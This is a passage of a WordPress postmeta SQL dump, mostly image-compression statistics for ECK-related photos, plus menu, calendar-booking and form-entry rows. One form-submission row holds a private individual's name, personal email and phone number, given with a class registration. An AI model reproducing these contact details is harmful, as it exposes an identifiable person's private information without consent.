WP-Optimize'),(164144,148679,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21596;s:12:\"smushed-size\";i:19509;s:15:\"savings-percent\";d:9.660000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:21596;s:10:\"compressed\";i:19509;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8917;s:10:\"compressed\";i:8273;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2064;s:10:\"compressed\";i:1640;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:9261;s:10:\"compressed\";i:8610;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9981;s:10:\"compressed\";i:9262;}}}'),(164145,148680,'original-file','2019/09/Lai-Tsi-updraft-pre-smush-original.jpg'),(164146,148680,'smush-complete','1'),(164147,148680,'smush-info','The file was compressed from 24.26 KB to 21.21 KB saving 12.55 percent using WP-Optimize'),(164148,148680,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:24842;s:12:\"smushed-size\";i:21724;s:15:\"savings-percent\";d:12.550000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:24842;s:10:\"compressed\";i:21724;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9898;s:10:\"compressed\";i:9218;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2194;s:10:\"compressed\";i:1782;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10281;s:10:\"compressed\";i:9367;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:11056;s:10:\"compressed\";i:10091;}}}'),(164149,148681,'original-file','2019/09/Peddar-Zaskq-updraft-pre-smush-original.jpg'),(164150,148681,'smush-complete','1'),(164151,148681,'smush-info','The file was compressed from 20.94 KB to 18.68 KB saving 10.79 percent using WP-Optimize'),(164152,148681,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21440;s:12:\"smushed-size\";i:19127;s:15:\"savings-percent\";d:10.78999999999999914734871708787977695465087890625;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:21440;s:10:\"compressed\";i:19127;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8579;s:10:\"compressed\";i:7952;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2041;s:10:\"compressed\";i:1625;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:8944;s:10:\"compressed\";i:8325;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9639;s:10:\"compressed\";i:8995;}}}'),(164153,148682,'original-file','2019/09/Rami-Nuri-updraft-pre-smush-original.jpg'),(164154,266569,'_edit_lock','1655062435:2'),(164155,148682,'smush-complete','1'),(164156,148682,'smush-info','The file was compressed from 20.87 KB to 18.46 KB saving 11.55 percent using WP-Optimize'),(164157,148682,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21368;s:12:\"smushed-size\";i:18901;s:15:\"savings-percent\";d:11.550000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:21368;s:10:\"compressed\";i:18901;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9032;s:10:\"compressed\";i:8307;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2182;s:10:\"compressed\";i:1744;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:9407;s:10:\"compressed\";i:8659;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10168;s:10:\"compressed\";i:9382;}}}'),(164158,148683,'original-file','2019/09/Rebazar-Tarzs-updraft-pre-smush-original.jpg'),(164159,148683,'smush-complete','1'),(164160,148683,'smush-info','The file was compressed from 23.65 KB to 21.22 KB saving 10.28 percent using WP-Optimize'),(164161,148683,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:24215;s:12:\"smushed-size\";i:21725;s:15:\"savings-percent\";d:10.2799999999999993605115378159098327159881591796875;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:24215;s:10:\"compressed\";i:21725;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9821;s:10:\"compressed\";i:9143;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2200;s:10:\"compressed\";i:1776;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10574;s:10:\"compressed\";i:9657;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:11363;s:10:\"compressed\";i:10374;}}}'),(164162,148684,'original-file','2019/09/Shamus-i-Tabriz-updraft-pre-smush-original.jpg'),(164163,148684,'smush-complete','1'),(164164,148684,'smush-info','The file was compressed from 22.85 KB to 20.92 KB saving 8.47 percent using WP-Optimize'),(164165,148684,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:23402;s:12:\"smushed-size\";i:21421;s:15:\"savings-percent\";d:8.4700000000000006394884621840901672840118408203125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:23402;s:10:\"compressed\";i:21421;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9238;s:10:\"compressed\";i:8585;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2104;s:10:\"compressed\";i:1673;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10170;s:10:\"compressed\";i:9491;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:11068;s:10:\"compressed\";i:10166;}}}'),(164166,148685,'original-file','2019/09/Towart-Managi-updraft-pre-smush-original.jpg'),(164167,148685,'smush-complete','1'),(164168,148685,'smush-info','The file was compressed from 20.52 KB to 18.24 KB saving 11.12 percent using WP-Optimize'),(164169,148685,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21010;s:12:\"smushed-size\";i:18674;s:15:\"savings-percent\";d:11.1199999999999992184029906638897955417633056640625;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:21010;s:10:\"compressed\";i:18674;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8861;s:10:\"compressed\";i:8219;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2004;s:10:\"compressed\";i:1578;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:9332;s:10:\"compressed\";i:8708;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9972;s:10:\"compressed\";i:9271;}}}'),(164170,148686,'original-file','2019/09/Yaubl-Sacabi-updraft-pre-smush-original.jpg'),(164171,148686,'smush-complete','1'),(164172,148686,'smush-info','The file was compressed from 19.63 KB to 17.97 KB saving 8.46 percent using WP-Optimize'),(164173,148686,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:20104;s:12:\"smushed-size\";i:18404;s:15:\"savings-percent\";d:8.46000000000000085265128291212022304534912109375;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:20104;s:10:\"compressed\";i:18404;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8340;s:10:\"compressed\";i:7687;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1993;s:10:\"compressed\";i:1574;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:9024;s:10:\"compressed\";i:8326;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9561;s:10:\"compressed\";i:8831;}}}'),(193903,269234,'_menu_item_type','post_type'),(193904,269234,'_menu_item_menu_item_parent','0'),(193905,269234,'_menu_item_object_id','68102'),(193906,269234,'_menu_item_object','page'),(193907,269234,'_menu_item_target',''),(193908,269234,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(193909,269234,'_menu_item_xfn',''),(193910,269234,'_menu_item_url',''),(193912,247330,'_wp_old_date','2023-06-30'),(193913,247336,'_wp_old_date','2023-06-30'),(193914,265030,'_wp_old_date','2023-06-30'),(193915,264903,'_wp_old_date','2023-06-30'),(193916,264902,'_wp_old_date','2023-06-30'),(193917,264901,'_wp_old_date','2023-06-30'),(193918,247345,'_wp_old_date','2023-06-30'),(193919,267897,'_wp_old_date','2023-06-30'),(193920,247332,'_wp_old_date','2023-06-30'),(193921,266761,'_wp_old_date','2023-06-30'),(193922,266281,'_wp_old_date','2023-06-30'),(193923,247342,'_wp_old_date','2023-06-30'),(193924,261921,'_wp_old_date','2023-06-30'),(193925,247343,'_wp_old_date','2023-06-30'),(193926,247344,'_wp_old_date','2023-06-30'),(193931,269243,'_field_654','Thomas'),(193932,269243,'_field_652','Boston '),(193933,269243,'_field_653','thomasjboston@gmail.com'),(193934,269243,'_field_651','(303) 589-8008'),(193935,269243,'_field_656','The ECK Satsang Discourses  Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 700 pm - Zoom'),(193936,269243,'_field_649',''),(193937,269243,'_form_id','61'),(193938,269243,'_seq_num','85'),(194044,269259,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(194045,269259,'mec_certain_weekdays','a:0:{}'),(194046,269259,'mec_allday','0'),(194047,269259,'one_occurrence','0'),(194048,269259,'mec_hide_time','0'),(194049,269259,'mec_hide_end_time','0'),(194050,269259,'mec_comment',''),(194051,269259,'mec_timezone','global'),(194052,269259,'mec_countdown_method','global'),(194053,269259,'mec_public','1'),(194054,269259,'mec_start_date','2023-11-05'),(194055,269259,'mec_start_time_hour','10'),(194056,269259,'mec_start_time_minutes','30'),(194057,269259,'mec_start_time_ampm','AM'),(194058,269259,'mec_start_day_seconds','37800'),(194059,269259,'mec_end_date','2023-11-05'),(194060,269259,'mec_end_time_hour','11'),(194061,269259,'mec_end_time_minutes','30'),(194062,269259,'mec_end_time_ampm','PM'),(194063,269259,'mec_end_day_seconds','84600'),(194064,269259,'mec_repeat_status','0'),(194065,269259,'mec_repeat_type',''),(194066,269259,'mec_repeat_interval','1'),(194067,269259,'mec_repeat_end',''),(194068,269259,'mec_repeat_end_at_occurrences','9'),(194069,269259,'mec_repeat_end_at_date',''),(194070,269259,'mec_advanced_days','a:0:{}'),(194071,269259,'mec_in_days',''),(194072,269259,'mec_not_in_days',''),(194073,269259,'mec_hourly_schedules','a:0:{}'),(194074,269259,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(164190,165248,'original-file','2019/09/ECK_Temple_CO_031-lg-updraft-pre-smush-original.jpg'),(164191,165248,'smush-complete','1'),(164192,165248,'smush-info','The file was compressed from 85.49 KB to 67.81 KB saving 20.68 percent using WP-Optimize'),(164193,165248,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:87541;s:12:\"smushed-size\";i:69435;s:15:\"savings-percent\";d:20.67999999999999971578290569595992565155029296875;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:87541;s:10:\"compressed\";i:69435;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13370;s:10:\"compressed\";i:12050;}s:6:\"medium\";a:2:{s:8:\"original\";i:33897;s:10:\"compressed\";i:30715;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:49256;s:10:\"compressed\";i:44733;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2353;s:10:\"compressed\";i:1905;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:40020;s:10:\"compressed\";i:36457;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:25511;s:10:\"compressed\";i:23142;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:86323;s:10:\"compressed\";i:79437;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22344;s:10:\"compressed\";i:20188;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:50281;s:10:\"compressed\";i:45873;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18109;s:10:\"compressed\";i:16305;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:49033;s:10:\"compressed\";i:44613;}}}'),(164194,165249,'original-file','2019/09/ECK_Temple_CO_032-lg-updraft-pre-smush-original.jpg'),(164195,165249,'smush-complete','1'),(164196,165249,'smush-info','The file was compressed from 120.77 KB to 66.84 KB saving 44.66 percent using WP-Optimize'),(164197,165249,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:123671;s:12:\"smushed-size\";i:68444;s:15:\"savings-percent\";d:44.659999999999996589394868351519107818603515625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:123671;s:10:\"compressed\";i:68444;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13826;s:10:\"compressed\";i:12354;}s:6:\"medium\";a:2:{s:8:\"original\";i:32374;s:10:\"compressed\";i:29244;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:49569;s:10:\"compressed\";i:44833;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2489;s:10:\"compressed\";i:2033;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:39109;s:10:\"compressed\";i:35582;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:24497;s:10:\"compressed\";i:22098;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:78509;s:10:\"compressed\";i:72108;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22596;s:10:\"compressed\";i:20422;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:49119;s:10:\"compressed\";i:44675;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18143;s:10:\"compressed\";i:16307;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:47544;s:10:\"compressed\";i:43160;}}}'),(164198,165250,'original-file','2019/09/ECK_Temple_CO_033-lg-updraft-pre-smush-original.jpg'),(164199,165250,'smush-complete','1'),(164200,165250,'smush-info','The file was compressed from 130.32 KB to 116.83 KB saving 10.35 percent using WP-Optimize'),(164201,165250,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:133449;s:12:\"smushed-size\";i:119639;s:15:\"savings-percent\";d:10.3499999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:15:{s:4:\"full\";a:2:{s:8:\"original\";i:133449;s:10:\"compressed\";i:119639;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14256;s:10:\"compressed\";i:12735;}s:6:\"medium\";a:2:{s:8:\"original\";i:24194;s:10:\"compressed\";i:21581;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:106212;s:10:\"compressed\";i:96765;}s:5:\"large\";a:2:{s:8:\"original\";i:162200;s:10:\"compressed\";i:148976;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:55454;s:10:\"compressed\";i:49899;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2491;s:10:\"compressed\";i:2019;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:41130;s:10:\"compressed\";i:37078;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:17841;s:10:\"compressed\";i:15880;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:64033;s:10:\"compressed\";i:57823;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:113486;s:10:\"compressed\";i:103456;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:39347;s:10:\"compressed\";i:35335;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:87205;s:10:\"compressed\";i:79215;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:19814;s:10:\"compressed\";i:17722;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:53080;s:10:\"compressed\";i:47650;}}}'),(164202,165251,'original-file','2019/09/ECK_Temple_CO_034-lg-updraft-pre-smush-original.jpg'),(164203,165251,'smush-complete','1'),(164204,165251,'smush-info','The file was compressed from 79.16 KB to 64.00 KB saving 19.16 percent using WP-Optimize'),(164205,165251,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:81064;s:12:\"smushed-size\";i:65533;s:15:\"savings-percent\";d:19.160000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:81064;s:10:\"compressed\";i:65533;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12928;s:10:\"compressed\";i:11687;}s:6:\"medium\";a:2:{s:8:\"original\";i:30957;s:10:\"compressed\";i:28148;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:46501;s:10:\"compressed\";i:42418;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2373;s:10:\"compressed\";i:1920;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:37232;s:10:\"compressed\";i:34029;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23506;s:10:\"compressed\";i:21392;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:77818;s:10:\"compressed\";i:71285;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:21737;s:10:\"compressed\";i:19745;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:48311;s:10:\"compressed\";i:44173;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17209;s:10:\"compressed\";i:15598;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:46221;s:10:\"compressed\";i:42247;}}}'),(164206,165252,'original-file','2019/09/ECK_Temple_CO_035-lg-updraft-pre-smush-original.jpg'),(164207,165252,'smush-complete','1'),(164208,165252,'smush-info','The file was compressed from 62.26 KB to 37.61 KB saving 39.59 percent using WP-Optimize'),(164209,165252,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:63753;s:12:\"smushed-size\";i:38515;s:15:\"savings-percent\";d:39.590000000000003410605131648480892181396484375;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:63753;s:10:\"compressed\";i:38515;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11533;s:10:\"compressed\";i:10586;}s:6:\"medium\";a:2:{s:8:\"original\";i:26695;s:10:\"compressed\";i:24518;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:31650;s:10:\"compressed\";i:29264;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2108;s:10:\"compressed\";i:1706;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:34017;s:10:\"compressed\";i:31389;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:38250;s:10:\"compressed\";i:35304;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11944;s:10:\"compressed\";i:10945;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14570;s:10:\"compressed\";i:13359;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:34962;s:10:\"compressed\";i:32292;}}}'),(164210,165253,'original-file','2019/09/ECK_Temple_CO_036-lg-updraft-pre-smush-original.jpg'),(164211,165253,'smush-complete','1'),(164212,165253,'smush-info','The file was compressed from 88.20 KB to 71.38 KB saving 19.06 percent using WP-Optimize'),(164213,165253,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:90313;s:12:\"smushed-size\";i:73096;s:15:\"savings-percent\";d:19.059999999999998721023075631819665431976318359375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:90313;s:10:\"compressed\";i:73096;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14043;s:10:\"compressed\";i:12698;}s:6:\"medium\";a:2:{s:8:\"original\";i:34490;s:10:\"compressed\";i:31210;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:50703;s:10:\"compressed\";i:45808;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2535;s:10:\"compressed\";i:2071;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:40496;s:10:\"compressed\";i:36673;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:26056;s:10:\"compressed\";i:23507;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:85291;s:10:\"compressed\";i:77630;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:24037;s:10:\"compressed\";i:21708;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:52924;s:10:\"compressed\";i:48008;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18893;s:10:\"compressed\";i:17099;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:50510;s:10:\"compressed\";i:45850;}}}'),(164214,165254,'original-file','2019/09/ECK_Temple_CO_037-lg-updraft-pre-smush-original.jpg'),(164215,165254,'smush-complete','1'),(164216,165254,'smush-info','The file was compressed from 101.55 KB to 55.83 KB saving 45.03 percent using WP-Optimize'),(164217,165254,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:103990;s:12:\"smushed-size\";i:57167;s:15:\"savings-percent\";d:45.030000000000001136868377216160297393798828125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:103990;s:10:\"compressed\";i:57167;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11087;s:10:\"compressed\";i:9967;}s:6:\"medium\";a:2:{s:8:\"original\";i:22440;s:10:\"compressed\";i:20415;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:35368;s:10:\"compressed\";i:32468;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2116;s:10:\"compressed\";i:1700;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:32025;s:10:\"compressed\";i:29200;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:17165;s:10:\"compressed\";i:15550;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:57164;s:10:\"compressed\";i:52605;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:19407;s:10:\"compressed\";i:17667;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:42642;s:10:\"compressed\";i:39054;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13852;s:10:\"compressed\";i:12593;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:36581;s:10:\"compressed\";i:33396;}}}'),(164218,165255,'original-file','2019/09/ECK_Temple_CO_038-lg-updraft-pre-smush-original.jpg'),(164219,165255,'smush-complete','1'),(164220,165255,'smush-info','The file was compressed from 99.47 KB to 49.95 KB saving 49.78 percent using WP-Optimize'),(164221,165255,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:101859;s:12:\"smushed-size\";i:51150;s:15:\"savings-percent\";d:49.780000000000001136868377216160297393798828125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:101859;s:10:\"compressed\";i:51150;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9531;s:10:\"compressed\";i:8921;}s:6:\"medium\";a:2:{s:8:\"original\";i:23887;s:10:\"compressed\";i:22292;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:34498;s:10:\"compressed\";i:32266;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2043;s:10:\"compressed\";i:1625;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:27190;s:10:\"compressed\";i:25695;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18386;s:10:\"compressed\";i:17048;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:59525;s:10:\"compressed\";i:56391;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:16753;s:10:\"compressed\";i:15556;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:36481;s:10:\"compressed\";i:34336;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13587;s:10:\"compressed\";i:12519;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:34517;s:10:\"compressed\";i:32476;}}}'),(164222,165256,'original-file','2019/09/ECK_Temple_CO_039-lg-updraft-pre-smush-original.jpg'),(164223,165256,'smush-complete','1'),(164224,165256,'smush-info','The file was compressed from 69.85 KB to 56.19 KB saving 19.56 percent using WP-Optimize'),(164225,165256,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:71525;s:12:\"smushed-size\";i:57538;s:15:\"savings-percent\";d:19.559999999999998721023075631819665431976318359375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:71525;s:10:\"compressed\";i:57538;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11544;s:10:\"compressed\";i:10488;}s:6:\"medium\";a:2:{s:8:\"original\";i:28426;s:10:\"compressed\";i:26037;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:43924;s:10:\"compressed\";i:40219;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2235;s:10:\"compressed\";i:1802;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:32707;s:10:\"compressed\";i:30277;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21545;s:10:\"compressed\";i:19669;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:69743;s:10:\"compressed\";i:64984;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:19893;s:10:\"compressed\";i:18194;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:43284;s:10:\"compressed\";i:39962;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15887;s:10:\"compressed\";i:14416;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:41607;s:10:\"compressed\";i:38369;}}}'),(164226,165257,'original-file','2019/09/ECK_Temple_CO_040-lg-updraft-pre-smush-original.jpg'),(164227,165257,'smush-complete','1'),(164228,165257,'smush-info','The file was compressed from 105.62 KB to 86.41 KB saving 18.19 percent using WP-Optimize'),(164229,165257,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:108157;s:12:\"smushed-size\";i:88486;s:15:\"savings-percent\";d:18.190000000000001278976924368180334568023681640625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:108157;s:10:\"compressed\";i:88486;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15480;s:10:\"compressed\";i:13794;}s:6:\"medium\";a:2:{s:8:\"original\";i:39641;s:10:\"compressed\";i:35405;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:60817;s:10:\"compressed\";i:54352;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2552;s:10:\"compressed\";i:2082;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:46967;s:10:\"compressed\";i:42201;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:29371;s:10:\"compressed\";i:26131;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:100529;s:10:\"compressed\";i:90893;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:27229;s:10:\"compressed\";i:24267;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:61698;s:10:\"compressed\";i:55357;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:21302;s:10:\"compressed\";i:18897;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:59297;s:10:\"compressed\";i:53179;}}}'),(164230,165258,'original-file','2019/09/ECK_Temple_CO_041-lg-updraft-pre-smush-original.jpg'),(164231,165258,'smush-complete','1'),(164232,165258,'smush-info','The file was compressed from 126.72 KB to 72.77 KB saving 42.58 percent using 